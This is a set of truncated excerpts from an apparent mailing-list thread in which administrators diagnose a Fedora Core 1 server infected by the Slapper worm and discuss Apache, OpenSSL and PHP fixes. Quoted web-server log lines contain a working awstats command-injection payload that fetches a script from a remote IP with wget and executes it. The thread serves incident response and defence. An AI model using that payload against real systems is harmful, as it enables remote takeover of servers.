Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1, but in
analysing now how it got in (it seems to use SSLv2 vulnerabilities in an apache
SSL server which
Michael Mansour wrote:
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1, but in
analysing now how
Hi James,
Michael Mansour wrote:
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1,
On Mon, 2006-01-23 at 15:42 -0500, James Kosin wrote:
Michael,
Try my version of httpd here:
http://support.intcomgrp.com/~jkosin
It has been effective against the worm so far.
James, what is in your package that we haven't included in our Apache?
I was under the assumption that we had
Michael Mansour wrote:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows
Jesse Keating wrote:
James, what is in your package that we haven't included in our Apache?
I was under the assumption that we had fixed all the CVEs related to the
slapper worm and that our users were safe. If this isn't the case, we
have a
Hi Kelson,
Michael Mansour wrote:
220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 403 344 - Mozilla/4.0
On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote:
My version takes care of the mod_ssl issue he already disabled. FC1
doesn't have a fix or if so it hasn't gone through QA yet.
Do you have a CVE for the ssl issue? I'd like to see if it is somewhere
in the QA pipeline.
--
Jesse
On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote:
I'm using:
perl-5.8.3-17.4.legacy
httpd-2.0.51-1.9.legacy
openssl-0.9.7a-33.13.legacy
Are there any updates FL can do to any of the packages to fix/block slapper
from an FC1 machine?
What version of php are you running?
Marc.
Hi Marc,
On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote:
I'm using:
perl-5.8.3-17.4.legacy
httpd-2.0.51-1.9.legacy
openssl-0.9.7a-33.13.legacy
Are there any updates FL can do to any of the packages to fix/block slapper
from an FC1 machine?
What version of php are
Hi Marc,
On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote:
No I'm not sure. Reading through the link above, it does seem that you've hit
the nail on the head with this one. I have two other FC1 machines and they
weren't affected by Slapper (even when the 3rd one was). The FC1
On Monday 23 January 2006 14:32, Michael Mansour wrote:
403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft